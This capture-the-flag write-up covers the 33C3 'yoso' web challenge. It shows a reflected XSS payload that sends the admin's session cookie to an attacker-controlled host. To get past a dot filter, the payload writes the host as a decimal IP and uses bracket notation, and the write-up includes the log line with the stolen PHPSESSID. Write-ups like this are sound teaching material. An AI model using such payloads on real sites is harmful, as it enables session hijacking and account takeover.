# yoso (web, 250, 38 solves)
You only live once, so why search twice?
(admins love to search for flags btw)
We are able to send a link to the admin, who then visits it. Our goal is to download the admin's bookmarks.
After some investigation, we found a reflected XSS at http://78.46.224.80:1337/download.php?zip=<script>alert("hello world")</script>
So all we have to do now is either steal the admin's cookie, or fetch the zip with an AJAX/XMLHttpRequest request and then send its contents to ourdomain.com/+data. We'll go with the first option, as it's a lot easier.
Payload:
<script> window.location = "http://nazywam.host/itWorks!"+document.cookie </script>
Unfortunately, the zip parameter is filtered: all dots are removed. So we have to find a way to bypass it.
nazywam.host -> 1558071511 (the same host written as a decimal IP)
window.location -> window["location"]
document.cookie -> document["cookie"]
string + string -> string["concat"](string)
Final payload:
<script>window["location"] = "http://1558071511/itWorks!"["concat"](document["cookie"]) </script>
This allows us to get the cookie:
78.46.224.80 - - [29/Dec/2016:11:46:48 +0100] "GET /itWorks!PHPSESSID=ol8gur9chbfq0g0ufnm6h8vrc1 HTTP/1.1" 404 143 "http://78.46.224.80:1337/download.php?zip=%3Cscript%3Ewindow[%22location%22]%20=%20%22http://1558071511/itWorks!%22[%22concat%22](document[%22cookie%22])%20%3C/script%3E" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
And finally, the flag: 33C3_lol_wHo_needs_scr1pts_anyway